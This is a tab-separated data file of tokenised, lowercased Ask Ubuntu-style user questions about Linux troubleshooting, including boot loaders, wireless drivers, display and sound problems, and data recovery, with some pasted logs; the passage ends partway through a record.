354085	live cd live usb not working in samsung laptop	i am using samsung notebook np305e5a-a03in ( http : //www.samsung.com/in/support/model/np305e5a-a03in ) . i had both windows 7 and ubuntu 12.04 in my laptop . somehow windows 7 got corrupted and i reinstalled the same . now i am trying to repair the grub . i tried using a pen drive ( used u-net bootin for ubuntu installation ) and tried to boot from the same . but after showing ubuntu logo it is getting stuck in between . i tried the same pen drive in my friends laptop it is working fine . i tried live cd too but in vain . i have tried both boot repair disk and ordinary disk . i also tried booting with ahcpi off . what should i do to repair the grub ?
354086	system monitor network speed monitor not working for lan but works for my wi-fi	i 'm on ubuntu 13.10 . i generally use wi-fi to connect to the internet . but yesterday my wi-fi router occurred some problem and now it 's out for warranty . so temporarily i 'm using lan . system monitor displayed the network speed correctly when i was in wi-fi . but now it 's not showing any kinda network speed in system monitor . i checked the preferences opption but could n't find a way . i also checked `` ksysguard '' ( kde 's system monitor ) and conky . none of them working . how can i solve this ? i 'm attaching a screenshot to clear the problem .
354087	grub rescue : grub not installed	i tried to install beside my windows 7 . it did n't work . after installing it could not find the root directory and i got some other error messages ... i just wanted my computer to be faster again so instead i decided to reinstall windows from recovery disk . it formatted the disk and installed windows again . the hard-disk has msdos structure now and the ubuntu partition is empty when i start up the computer grab is starting up an i get a grab rescue problem , but grab is no longer installed . how can i boot directly into windows ? i can boot ubuntu from an usb stick but i 'm not able to install it anymore . i just want windows to work again ... i 'm hoping for advice ... linda
354088	how to make compiz consume less resources ?	every time my machine is stumbling , i run a top command and the compiz process is eating a lot of cpu . how can i configure it to consume the minimum of machine resources ? i do n't care for fancy graphics or effects . i have an integrated intel graphic card .
354090	usb audio device not detected	i 've been having problems with usb sound for some time ( it used to work about 6 months ago ) . i find that any usb sound device that i connect is not recognised , and is not listed by aplay -l i 've tried disabling pulseaudio . i 've tried purging and re-installing alsa-base , pulseaudio , and pavucontrol . to no avail . i 'm using 12.04 lts .
354093	how can i set up two monitors to watch images onap ?	i have to work to design images about onap what are my products . so i need to use two monitors for that . but i can not . and so how can i set up two monitors to watch images onap with one pc ?
354102	how to increase icons and fonts in nautilus sidebar ( left pane ) ?	i imagine there is a setting for that but i can not find it ...
354105	can not detect external hdd on ubuntu	hi all i have an external hdd dock with a 150gb drive in it i am trying to access in linux , but i can not see it all i see is : root @ ubuntu : /home/richard # fdisk -l disk /dev/sda : 161.1 gb , 161061273600 bytes 255 heads , 63 sectors/track , 19581 cylinders , total 314572800 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000a7dbe device boot start end blocks id system /dev/sda1 * 2048 88082431 44040192 83 linux /dev/sda2 88084478 104855551 8385537 5 extended /dev/sda5 88084480 104855551 8385536 82 linux swap / solaris i have 1 x 120gb , 2 x 640gb drives in raid , and a 1.81tb drive connect to the pc , and the external hdd , however it is only displaying a 161.1 gb drive , how can i see the other drives ? i am using vmware to use linux
354107	ubuntu 13.04 does not turn off/lock screen nvidia driver	i have a dell precision 4400 with nvidia fx 1700m video card . i had linux mint 14 before and screen turn off/lock were working fine . i installed ubuntu 13.04 and i am using the current driver from nvidia that comes w/the distro ( nvidia-current ) which is version 304.xx ( the others did n't work and the nouveau driver was having major issues . ) in brightness and lock , i set the screen turn off time to 5 mins and the lock screen after to 5 mins . however , the screen never turns off/lock . is this possibly related to the driver ? ! ? ( i have another ubuntu 12.10 install on a dell inspiron -- different os level and graphics card -- and it works as expected . ) thanks for any help .
354111	boot ubuntu 12.04.3 in uefi mode	i have installed ubuntu on my pc ( sony vaio pro 13 ) in uefi mode and the installation completed without any problem . after that when i restart the system does not boot ubuntu so i tried with boot-repair that told me that has fixed the boot successfully , but at the restart again ubuntu does not boot . this is the output of boot-repair http : //pastebin.ubuntu.com/6196773/ , if someone can hekp me i 'll be greatfull because i do not know what to do at the moment ! ! ! thank you claudio
354112	ubuntu downloads very slow . i do n't find solution . help me please .	i have a problem with ubuntu 13.04 , when i want to download something in direct download , i have n't tried torrent but i do n't want such solution , is there a way to download the files faster without using any software for that task ? i mean : setting up something in the software . all i find are programs . i have already changed the dns using namebench , but still i download slow . thank you
354114	keyboard and mouse freezes with ubuntu	im new in this ubuntu stuff , and as a first try i tried ubuntu 12.04 via windows installer ( wubi ) it installs all correctly and when i reboot it autoboots on ubuntu , and it says like 1 min about initializing ubuntu if i remember ( 5 dots charging ) and then , when i enter the password screen , all freezes . i mean the mouse and keyboard works like 5 seconds after boot , then freeze . i just ca n't do nothing but restart i have old keyboard and mouse ( that strange green and purple cable ) it has anything to do with that ?
354116	learning the command line	this is n't really a technical question but i am curious as to how long it takes to learn the linux command line . i would like to learn how to be able to do as much as possible easily from the command line . i just bought a book , linux command line and shell scripting bible . i know that this book will be of great help , but i just have no clue how long it will be before i can successfully naviagte the terminal with ease . if you could post and let me know about your experience with the terminal , and the learning process , that would be greatly appreciated . thank you in advance .
354117	control my transmission gtk remotely	while i 'm not home i left transmission running , usually at full speed . i 've been mostly using the desktop gui ( gtk ) version . i have been toying with the cli version ( not sure which is the proper one between transmission-cli and transmission-remote-cli ) , and the web version ( transmission-daemon ) , but my idea , rather than starting new downloads , is to control the downloads i have already running . i am using my home computer also as a file and web server , and i want to be able to check if a torrent has already finished , or i have wanted to pause , change priorities or control the bandwidth for those downloads still in the gtk when i am away . is there a way , either web ( prefered ) or cli , that will allow me to control desktop downloads with transmission when i am away ?
354120	what ubuntu should i download for a macbook air 2011 ?	i found out that i need to download the 64bit . but what version should i download . 12.04 or 13.04 . thanks !
354122	ca n't play protected content on youtube	bear with me , because i 'm no developer/coder ... i ca n't play protected content on youtube on my acer nettop running ubuntu 13.04 . i 've followed the advice here http : //helpx.adobe.com/x-productkb/multi/flash-player-11-problems-playing.html and installed hal and cleared out nativecache assetcache apsprivatedata2 but it still wont play movies purchased from google play . i 've tried a chrome and firefox and two versions of flash : chrome ( v30.0.1599.66 ) with version 11.8.800.170 of flash buffers the entire movie but sits there with a blank screen and no error message and not playing . when i disable 11.8.800.170 and force it to use 11.2r202 i see the movie briefly but get the message `` there is a problem with your flash player . click here , select `` reset licence files '' , and restart your browser . '' which has no effect . it 's the same using firefox , which is using 11.2.202.310 . i 'm completely stumped , especially as i 've got it working on my notebook simply by installing hal and removing nativecache assetcache apsprivatedata2 . the only difference between my notebook and nettop that i can see is that my notebook is running 64bit and the version of chrome is 29.0.1547.76 . anyone any ideas ?
354124	antivirus : pros and cons of quarantine and deleting ( clamav particularity ) . clean option	what are the pros and cons of qurantine and deleting in an antivirus ? does clamav have some particularity on this point ? also , is there some antivirus or anti-malware which allows to clean the infected file ? thanks in advance
354127	special chars in variable 's value get escaped	say i declare variable var as var= '' ls | grep a '' . then i would expect the command $ var to work exactly as ls | grep a , but instead the | char is read as escaped \| so that it rather prints an error saying that no file named \| , grep or a is found . my question is : how can i make bash interpret | in var 's value as not escaped ? i have to use it in a case statement such as var1= '' str1|str2 '' var2= '' str3|str4 '' case $ option in $ { var1 } ) echo `` it works ! 1 '' ; ; $ { var2 } ) echo `` it works ! 2 '' ; ; * ) echo `` it does not work '' esac ( edit2 ) : and make it return it works ! 1 if $ option is either str1 or str2 , and it works ! 2 if $ option is either str3 or str4 . that is because i am writing a function in which case patterns may change according to the user inputs . though i do n't think it is relevant to know , i use lxterminal on lubuntu 12.04 and $ bash_version is 4.2.25 ( 1 ) -release . any help is appreciated , thank you !
354129	what is the recommended way of dual booting multiple linux system using grub 2 ?	currently i am dual booting kubuntu 13.04 and kubuntu 13.10 beta 2 . i set this up by installing kubuntu 13.04 with separate /boot and /home , with grub installed to the mbr . when i installed kubuntu 13.10 beta 2 , there was no option to not install grub , so installed it to the partition i installed kubuntu 13.10 beta 2 on . when rebooting , it booted into kubuntu 13.04 , as expected . i ran update-grub , and it detected the new operating system . so the resulting partitions were : /boot for kubuntu 13.04 / for kubuntu 13.04 /home for kubuntu 13.04 / for kubuntu 13.10 beta 2 , with grub installed grub for kubuntu 13.04 installed to mbr . this works fine ; however it feels wrong having multiple installations of grub ; due to its auto-detection when doing update-grub , only one installation should be needed . i do n't actually know whether the grub installation on the kubuntu 13.10 beta 2 partition is actually used at any point in the boot process ! so , how should i have done it ?
354130	help needed getting error code 2 when installing ubuntu twelve.04 via wubu	issue while installing ubuntu via wubi on windows 7 below is the error log file `` \lib\wubi\application.py '' , line 58 , in run file `` \lib\wubi\application.py '' , line 132 , in select_task file `` \lib\wubi\application.py '' , line 158 , in run_installer file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\win32\backend.py '' , line 450 , in extract_diskimage exception : extraction failed with code : 2 any help will be much appreciated
354135	problem with source canonical dist	i m ubuntu 12.04 upgraded to 13.0 my problem is when i want to update i have a message : w : impossible de récupérer http : //archive.canonical.com/raring/dists/precise/partner/binary-i386/packages 404 not found really my problem is the font augie ( emerald package ) does n't much in texlive2013.iso that i intalled manually ( excuse my english ) . whats wrong please ?
354138	libosmesa.so is missing during mesa installation	i am trying to setup a virtual box for doing off-screen rendering with paraview . i have ubuntu 12.04 64-bit server installed in the box . for setting up paraview and mesa i have followed the instructions the links below : http : //www.paraview.org/wiki/paraview/users_guide/parallel_rendering # offscreen_software_rendering_via_osmesa http : //paraview.org/wiki/paraview/paraview_and_mesa_3d installation of mesa completes fine without and errors or warnings but when i try to build paraview and try to configure it for off-screen rendering , it gives an error in the middle of the `` make '' complaining about missing `` libosmesa.so '' . i searched the whole machine but that file is not there . it seems like it did n't get installed . am i supposed to install a library before building mesa ? how can i get that `` libosmesa.so '' installed . thanks for the help in advance .
354140	partitioning hard drive screwed up graphics	i 'm running 13.04 , and i just inserted a boot drive to shrink my current partition . when i did this , i rebooted and my graphics seem to be in 800x600 or so , and i ca n't change them because it 's as if i am really zoomed in on the gui , so i can only see the top quarter of the screen or so . i ca n't access any programs that are n't on my desktop , all i can do is open the terminal . i typed gnome-control-whatever to access the settings but i could n't see anything so that did n't help me much . what should i try next ? thanks in advance . edit : i managed to access the `` display '' settings through the gui but they are stuck in 640x480 and it is not allowing me to change them . i think it may be a graphics card issue . edit : i got the graphics to work by reinstalling my drivers . however , now i am missing my task bar . at this point i am considering reinstalling , is there a simple way to back up all files ?
354141	ubuntu touch install for galaxy tab 2 tablet	i am trying to install ubuntu touch on my galaxy tab 2 tablet . but for 'recover mode ' , the options i get are not same options as mentioned in the instructions . i get the following options : reboot now apply update from sdcard wipe data/factory reset wipe cache partition apply update from cache what should i do now ?
354142	data recovery after formating from ntfs to ext	ok , my 320gb internal laptop hdd was partioned as ( 1 ) 20gb partion ext4 ( 2 ) about 290gb extended partion to two ntfs partions ( 3 ) 4gb swap partion sure ubuntu is installed on the `` ext '' partition and all my data on the extended ntfs one , the problem that i stupidly install the new version of ubuntu and forget to check for which partition that will be the system ( ubuntu ) so i ended up with about 290gb ext partition with ubuntu installed and another extended 4gb partition as swap . i forgot about making a disk image , i used `` testdisk '' and it gave me 100gb of data separated on those `` recup '' files but it 's all filled with text files and corrupted video and mp3.. files which is actually has size . ..so i made an disk image after what all happed and i 'm storing it on another hdd..then used `` autopsy '' to recover from this image but it does n't recognize anything but the system files and those recup files and no deleted files it could recover .. i do n't know what to do.. i need the data i know that it will not come all but there 's a plenty of gettin a half or something as long i did n't overwrite on it more than 100gb ( belong to `` testdisk '' program recovered files i mentioned up there )
354144	pipelight not working with firefox or chrome	i installed pipelight by following the instructions on the website but it still does not work properly . kernel version 3.8.0-27-generic when launching chrome the logs show up as . can someone tell me what is wrong with my setup ? n-linux : ~ $ google-chrome & [ 1 ] 31528 husain @ husain-linux : ~ $ attention : default value of option force_s3tc_enable overridden by environment . [ 13:21:1005/131424 : error : platform_thread_linux.cc ( 99 ) ] failed to set nice value of thread to -10 [ pipelight : lin ] attached to process . [ pipelight : lin ] trying to load config file from '/home/husain/.config/pipelight ' . [ pipelight : lin ] trying to load config file from '/etc/pipelight ' . [ pipelight : lin ] trying to load config file from '/usr/share/pipelight/pipelight ' . [ pipelight : lin ] basicplugin.c:385 : checkgraphicdriver ( ) : gpu driver check - your driver is supported , hardware acceleration enabled . [ pipelight : lin ] using wine prefix directory /home/husain/.wine-pipelight/ . [ pipelight : lin ] checking silverlight installation - this might take some time . wine-silverlight5.1-installer is already installed in /home/husain/.wine-pipelight/ . wine-mpg2splt-installer is already installed in /home/husain/.wine-pipelight/ . wine : can not find l '' c : \\windows\\system32\\winemenubuilder.exe '' err : wineboot : processrunkeys error running cmd l '' c : \\windows\\system32\\winemenubuilder.exe -a -r '' ( 2 ) [ pipelight : win ] windowless mode is off . [ pipelight : win ] embedded mode is on . [ pipelight : win ] usermode timer is off . fixme : advapi : registertraceguidsw ( 0x2b1f87 , 0x350118 , { aa087e0e-0b35-4e28-8f3a-440c3f51eef1 } , 1 , 0x63f628 , ( null ) , ( null ) , 0x350118 , ) : stub [ pipelight : win ] init successful ! fixme : advapi : unregistertraceguids 0 : stub [ warning : flash/platform/pepper/pep_module.cpp ( 63 ) ] sandboxed
354145	hdmi sound not working , even after updating the packages said on other questions	i have looked around google , and came up on a few resources which all said to install the new updates , which i have done , but i still do not have a hdmi output option for sound , therefor here i am . since that did not work , what would be other solutions that could work ?
354148	syncronizing filesystems . replicating changes in local hd to removable hd and viceversa	i have a removable hard-drive where i keep a backup of most of my files , and while i can solve some little issue i also keep a copy of some directories in both ubuntu and windows partitions . after several installations and change of computers some of these files have been accumulating and , many times , they get duplicated when i move some of them in one system and not in the other . is there any tool available in ubuntu ( or elsewhere ) that will allow me to make changes in the directories in one system and then replicate them in the other systems ? i mean , after i rename files , move them from one subdirectory to another , or add or correct metadata in a media file ( thus changing the hashes ) , in one of the file systems , the changes can be replicated to the other copies . one possible method is copy one filesystem ( source ) into the other ( destination ) ; find duplicates in destination ; manually or programmaticly remove duplicates in destination ; erase the source filesystem and copy the files and structure from the destination file system . this procedure would be very time consuming with a large file system ( hundreds of thousands of files expanding to some 300~400 gb ) , and finding duplicates can not be done automatically if one of the copies have been modified ( v.g . because metadata has been corrected , or a minor edit was done in a document ) thank you in advance .
354150	how to install burg on ubuntu 13.04 with windows 8 dual boot ?	i 've dual booted my laptop with windows 8 pro and ubuntu 13.04 now i want to try themes on the grub2 because the grub 2 ui sucks : ( i 've that burg solves the problem for that so can anyone help me how to install burg in this dual boot case ?
354151	ra0 no scan results with ralink usb wireless device : usb device do not scan for wifi	hi i 'm new to ask ubuntu . sorry for any format mistakes i would have made . so as specified in title , i have just brought a usb wireless device wli-uc-g3000hp-v1 from buffalo inc. , and i have install the driver from instructions here : http : //www.cyberciti.biz/tips/linux-install-rt2870-chipset-based-usb-wireless-adapter.html now i 'm fine with the driver , but the usb device do not scan any wifi network . by this i mean that in * ifconfig ra0 * ra0 link encap : ethernet hwaddr 10:6f:3f : af:95 : d5 inet6 addr : fe80 : :126f:3fff : feaf:95d5/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:10614 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:3539056 ( 3.5 mb ) * iwconfig ra0 * ra0 ralink sta essid : '' dennis2860ap '' nickname : '' rt2870sta '' mode : auto frequency=2.412 ghz access point : not-associated bit rate:1 mb/s rts thr : off fragment thr : off link quality=10/100 signal level:0 dbm noise level:0 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 * sudo iwlist ra0 scan * ra0 no scan results * nm-tool * - device : ra0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : usb state : disconnected default : no hw address : 10:6f:3f : af:95 : d5 capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points and the relevant syslog : oct 6 00:47:49 user-lifebook-lh532 networkmanager [ 981 ] : scplugin-ifupdown : devices added ( path : /sys/devices/pci0000:00/0000:00:14.0/usb3/3-2/net/ra0 , iface : ra0 ) oct 6 00:47:49 user-lifebook-lh532 networkmanager [ 981 ] : scplugin-ifupdown : device added ( path : /sys/devices/pci0000:00/0000:00:14.0/usb3/3-2/net/ra0 , iface : ra0 ) : no ifupdown configuration found . oct 6 00:47:49 user-lifebook-lh532 networkmanager [ 981 ] : < info > ( ra0 ) : driver does not support ssid scans ( scan_capa 0x00 ) . oct 6 00:47:49 user-lifebook-lh532 networkmanager [ 981 ] : < info > ( ra0 ) : using wext for wifi device control oct 6 00:47:49 user-lifebook-lh532 networkmanager [ 981 ] : < error > [ 1380991669.299773 ] [ nm-device-wifi.c:2841 ] update_permanent_hw_address ( ) : ( ra0 ) : unable to read permanent mac address ( error 0 ) oct 6 00:47:49 user-lifebook-lh532 networkmanager [ 981 ] : < info > ( ra0 ) : new 802.11 wifi device ( driver : 'usb ' ifindex : 4 ) oct 6 00:47:49 user-lifebook-lh532 networkmanager [ 981 ] : < info > ( ra0 ) : exported as /org/freedesktop/networkmanager/devices/2 oct 6 00:47:49 user-lifebook-lh532 networkmanager [ 981 ] : < info > ( ra0 ) : device state change : unmanaged - > unavailable ( reason 'managed ' ) [ 10 20 2 ] oct 6 00:47:49 user-lifebook-lh532 networkmanager [ 981 ] : < info > ( ra0 ) : bringing up device . oct 6 00:47:49 user-lifebook-lh532 networkmanager [ 981 ] : < info > ( ra0 ) : preparing device . oct 6 00:47:49 user-lifebook-lh532 networkmanager [ 981 ] : < info > ( ra0 ) : deactivating device ( reason 'managed ' ) [ 2 ] oct 6 00:47:49 user-lifebook-lh532 networkmanager [ 981 ] : < info > ( ra0 ) : taking down device . oct 6 00:47:49 user-lifebook-lh532 networkmanager [ 981 ] : < warn > ( ra0 ) : failed to change interface mac address oct 6 00:47:49 user-lifebook-lh532 networkmanager [ 981 ] : < warn > ( ra0 ) : failed to reset mac address to 00:00:00:00:00:00 oct 6 00:47:50 user-lifebook-lh532 networkmanager [ 981 ] : < info > ( ra0 ) : taking down device . oct 6 00:47:50 user-lifebook-lh532 networkmanager [ 981 ] : < warn > ( ra0 ) : error 100 getting card mode oct 6 00:47:50 user-lifebook-lh532 networkmanager [ 981 ] : < error > [ 1380991670.341047 ] [ wifi-utils-wext.c:160 ] wifi_wext_set_mode ( ) : ( ra0 ) : error setting mode 2 oct 6 00:47:50 user-lifebook-lh532 networkmanager [ 981 ] : < info > ( ra0 ) : bringing up device . oct 6 00:47:51 user-lifebook-lh532 networkmanager [ 981 ] : < info > ( ra0 ) supports 1 scan ssids oct 6 00:47:51 user-lifebook-lh532 networkmanager [ 981 ] : < info > ( ra0 ) : supplicant interface state : starting - > ready oct 6 00:47:51 user-lifebook-lh532 networkmanager [ 981 ] : < info > ( ra0 ) : device state change : unavailable - > disconnected ( reason 'supplicant-available ' ) [ 20 30 42 ] oct 6 00:47:51 user-lifebook-lh532 networkmanager [ 981 ] : < info > ( ra0 ) : supplicant interface state : ready - > inactive oct 6 00:47:51 user-lifebook-lh532 networkmanager [ 981 ] : < info > ( ra0 ) supports 1 scan ssids oct 6 00:47:53 user-lifebook-lh532 avahi-daemon [ 946 ] : joining mdns multicast group on interface ra0.ipv6 with address fe80 : :126f:3fff : feaf:95d5 . oct 6 00:47:53 user-lifebook-lh532 avahi-daemon [ 946 ] : new relevant interface ra0.ipv6 for mdns . oct 6 00:47:53 user-lifebook-lh532 avahi-daemon [ 946 ] : registering new address record for fe80 : :126f:3fff : feaf:95d5 on ra0.* . oct 6 00:54:30 user-lifebook-lh532 networkmanager [ 981 ] : < info > ( ra0 ) : device state change : disconnected - > unmanaged ( reason 'removed ' ) [ 30 10 36 ] oct 6 00:54:30 user-lifebook-lh532 networkmanager [ 981 ] : < info > ( ra0 ) : cleaning up ... oct 6 00:54:30 user-lifebook-lh532 networkmanager [ 981 ] : < info > ( ra0 ) : taking down device . oct 6 00:54:31 user-lifebook-lh532 avahi-daemon [ 946 ] : interface ra0.ipv6 no longer relevant for mdns . oct 6 00:54:31 user-lifebook-lh532 avahi-daemon [ 946 ] : leaving mdns multicast group on interface ra0.ipv6 with address fe80 : :126f:3fff : feaf:95d5 . oct 6 00:54:31 user-lifebook-lh532 avahi-daemon [ 946 ] : withdrawing address record for fe80 : :126f:3fff : feaf:95d5 on ra0 . oct 6 00:54:31 user-lifebook-lh532 kernel : [ 1895.758809 ] ipv6 : addrconf ( netdev_up ) : ra0 : link is not ready i would appreciate any comment and assistance from you . thank you very much !
354152	soft lockup when installing ubuntu gnome in virtual machine ( parallels osx )	when installing ubuntu gnome 13.04 from an iso in parallels , i get the following error : bug : soft lockup - cpu # 0 stuck for 22s ! this is shortly followed by another message : info : rcu_sched self detected stall on cpu is this error the result of a problem with the ubuntu disc image or something else ? how can it be fixed ? note i have checked the integrity of the disc image and checked the disks for defects . no problems were detected .
354155	samsung series 9 ultrabook ( np900x3e ) overheating	i have the june version of the series 9 from samsung , and i 'm running saucy salamander to get the touchpad working correctly . the laptop is overheating though fairly often , and i have n't found any set of tools for power management that help me govern fan performance for this laptop . i am a developer and can happily provide any information requested . ( i have done only a very minimal amount of driver work . ) sensors indicates that at its warmest it runs at 80c . at this temperature , the laptop becomes non-responsive . i typically have to shut it down . i am nearly at the point of selling this one on craigslist and getting something else , because i use this laptop for work and having it freeze on me twice a day is a major distraction . but i really enjoy the form factor , screen , and keyboard of the samsung and would prefer not to , so any help would be appreciated .
354157	usb flash drive , unable to mount	once my flash drive was infected by some virus that produced the shortcuts for directories . after this infection the device could not be connected to any system and os . i tried it on ubuntu and found some signs of detection . when i insert the drive in the usb port . lsusb lists down the device as bus 002 device 121 : id 0951:1642 kingston technology dt101 g2 fdisk -l and blkid does not list this device . my question is that : as lsusb detects my device , is this the sign that my device is physically save ? fdisk does not list it as storage device , is that the sign that virus changed the status/type of my device to some non-storage device ? i do not know if this thought makes any sense . can the device be repaired any way ?
354160	proxpn via openvpn on 13.04	is anyone currently managing to use proxpn via openvpn ? i tried using the config files from both the mac and windows downloads per these instructions : http : //downgoat.net/2013/04/20/proxpn-openvpn-on-linux-configuration/ but i keep getting a timeout when i try to connect . oct 5 14:17:18 jonno-mythbuntu networkmanager [ 1065 ] : < info > vpn : loaded org.freedesktop.networkmanager.pptp oct 5 14:17:18 jonno-mythbuntu networkmanager [ 1065 ] : < info > vpn : loaded org.freedesktop.networkmanager.openvpn oct 5 14:17:18 jonno-mythbuntu networkmanager [ 1065 ] : keyfile : parsing vpn connection 1 ... oct 5 14:17:18 jonno-mythbuntu networkmanager [ 1065 ] : keyfile : read connection 'proxpn openvpn' oct 5 14:34:34 jonno-mythbuntu networkmanager [ 1065 ] : < info > starting vpn service 'openvpn ' ... oct 5 14:34:34 jonno-mythbuntu networkmanager [ 1065 ] : < info > vpn service 'openvpn ' started ( org.freedesktop.networkmanager.openvpn ) , pid 5105 oct 5 14:34:34 jonno-mythbuntu networkmanager [ 1065 ] : < info > vpn service 'openvpn ' appeared ; activating connections oct 5 14:34:37 jonno-mythbuntu networkmanager [ 1065 ] : < info > vpn plugin state changed : starting ( 3 ) oct 5 14:34:37 jonno-mythbuntu networkmanager [ 1065 ] : < info > vpn connection 'proxpn openvpn ' ( connect ) reply received . oct 5 14:34:37 jonno-mythbuntu nm-openvpn [ 5118 ] : openvpn 2.2.1 x86_64-linux-gnu [ ssl ] [ lzo2 ] [ epoll ] [ pkcs11 ] [ eurephia ] [ mh ] [ pf_inet6 ] [ ipv6 payload 20110424-2 ( 2.2rc2 ) ] built on feb 13 2013 oct 5 14:35:18 jonno-mythbuntu networkmanager [ 1065 ] : < warn > vpn connection 'proxpn openvpn ' ( ip config get ) timeout exceeded .
354161	gmail , under google chrome and ubuntu , it has only 3 text fonts . why ?	gmail , under google chrome and ubuntu , has only 3 text fonts . why ? they are : sans serif , serif and courier new . where are : comic sans ms and others ? can you help me ?
354162	ubuntu 12.04 lts - apple ipad 3 ( ios 7 non-jailbroken ) usb connection problem	i 've bought an apple ipad 3 ( ios 7 non-jailbroken ) , and i 'm trying to connect it to my pc running ubuntu 12.04 through the original usb cable . after i plugged in the cable , i got this message on the pc : the device 'ipad ' is locked . enter the passcode on the device and click 'try again ' . slide to unlock on ipad , it 's ok , i got this message on the pc again : the device 'ipad ' is locked . enter the passcode on the device and click 'try again ' . ipad : trust this computer ? trust/do n't trust i 've selected trust . pc : unable to mount - dbus error org.freedesktop.dbus.error.noreply : message did not receive a reply ( timeout by message bus ) ok , i 've read some forums , everywhere there was this solution : `` install : ifuse , libimobiledevice-utils , rhythmbox ok , i 've installed them through terminal , and used the idevicepair unpair & & idevicepair pair command also in the terminal . then i got this message : device is not paired with this host . i do n't know what to do . please help !
354165	ubuntu 12.04 freeze and screen glitch at startup	hey so i installed ubuntu via wubi . during the installation , it froze twice . i did some research and added 'nomodeset ' and the installation went through . since then every single time i start up ubuntu , it freezes and the screen glitches with some noise looking stuff on it . the mouse nor keyboard work . sometimes the computer will even freeze before it reaches the login screen . i have tried to research it and tried to change the network boot option as first , which did n't work . i think it might be something to do with my graphics card , but i do n't know how i can even try to update it without even getting into ubuntu first . im kind of a noob here , so any help will be greatly appreciated .
354168	am i at risk of wiping my windows 8 ?	i 'm using a windows 8 64 bit and i 'm intending download ubuntu 13. i downloaded the windows installer version but ubuntu would n't load , so i uninstalled it . so now that i 'm downloading the actual thing , am i going to lose my windows 8 os and all my other data , or will i be able to choose from both oss whenever my computer boots up ? i know this will be closed , but i just need to be positive of what i 'm doing , as i do n't want to lose anything .
354170	fix this bad computer problem	e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/us.archive.ubuntu.com_ubuntu_dists_raring_main_i18n_translation-en , e : the package lists or status file could not be parsed or opened .
354173	roccat isku fx multicolor - color change	i want to buy a roccat isku fx multicolor as replacement for my g15 . will the color be saved after configuration ( windows software ) ? after changing the color to green or to orange , will the same color be there using ubuntu/any other distro ?
354175	how to restore the cpu frequency defaults or to align the frequency at will ?	i really new at ubuntu and linux so i am not capable of understand the following : usage : update-rc.d [ -n ] [ -f ] < basename > remove update-rc.d [ -n ] < basename > defaults [ nn | ss kk ] update-rc.d [ -n ] < basename > start|stop nn runlvl [ runlvl ] [ ... ] . update-rc.d [ -n ] < basename > disable|enable [ s|2|3|4|5 ] -n : not really -f : force so , how is the right command to restore the cpu frequency defaults or to align the frequency at will ? this is because i installed tlp and used sudo update-rc.d -f ondemand remove but it turned out that the heating increased comparing tlp without the remove . can anyone help ?
354177	constant bad wifi password on lubuntu 13.04 -- wifi works fine in ubuntu 12.04lts	thanks for the help in advance . i have recently installed lubuntu 13.04 on my netbook . it is on a different hdd then my ubuntu 12.04lts . i can not get the wireless to work on my lubuntu install . i have attached the wifi stats to this thread for both installs iwconfig and lshw -c network . ubuntu 12.04lts had no issues with my realtek rtl8187se , as it worked right away without any fiddling . on lubuntu , it sees the network and i can attempt to connect but it always tells me the password is bad ( when it is not ) . even with no password i get the same . i tried linux mint 15 mate and kubuntu and the same thing happened . after searching , i found and tried many solutions : install or reinstall ndiswrapper then use official windows xp driver , ignore ipv6 and nothing worked . what 's going on here ? ubuntu 12.04 lts iwconfig output iwconfig lo no wireless extensions . wlan0 802.11b/g link essid : '' lechuga '' mode : managed frequency=2.412 ghz access point : 34:08:04 : e1:34 : da bit rate=54 mb/s retry : on rts thr : off fragment thr : off power management timeout:1ms mode : all packets received link quality=75/100 signal level=-43 dbm noise level=-104 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 eth0 no wireless extensions . sudo lshw -c network -network description : ethernet interface product : ar8132 fast ethernet vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:07:00.0 logical name : eth0 version : c0 serial : 00:26:9e:87:9c:13 capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.0-napi firmware=n/a latency=0 link=no multicast=yes port=twisted pair resources : irq:46 memory : c0800000-c083ffff ioport:2000 ( size=128 ) -network description : wireless interface product : rtl8187se wireless lan controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:08:00.0 logical name : wlan0 version : 22 serial : 00:26 : b6:5c : b1 : e9 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=r8180 ip=192.168.0.101 latency=0 multicast=yes wireless=802.11b/g link resources : irq:17 ioport:3000 ( size=256 ) memory : c0300000-c0303fff lubuntu 13.04 iwconfig output wlan0 802.11b/g essid : '' lechuga '' mode : managed frequency=2.422 ghz access point : not-associated bit rate:54 mb/s retry min limit:7 rts thr : off fragment thr : off power management : off link quality=0/100 signal level=0 dbm noise level=0 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 lo no wireless extensions . eth0 no wireless extensions . sudo lshw -c network -network description : ethernet interface product : ar8132 fast ethernet vendor : qualcomm atheros physical id : 0 bus info : pci @ 0000:07:00.0 logical name : eth0 version : c0 serial : 00:26:9e:87:9c:13 capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vpd bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=atl1c driverversion=1.0.1.1-napi latency=0 link=no multicast=yes port=twisted pair resources : irq:46 memory : c0400000-c043ffff ioport:3000 ( size=128 ) -network description : wireless interface product : rtl8187se wireless lan controller vendor : realtek semiconductor co. , 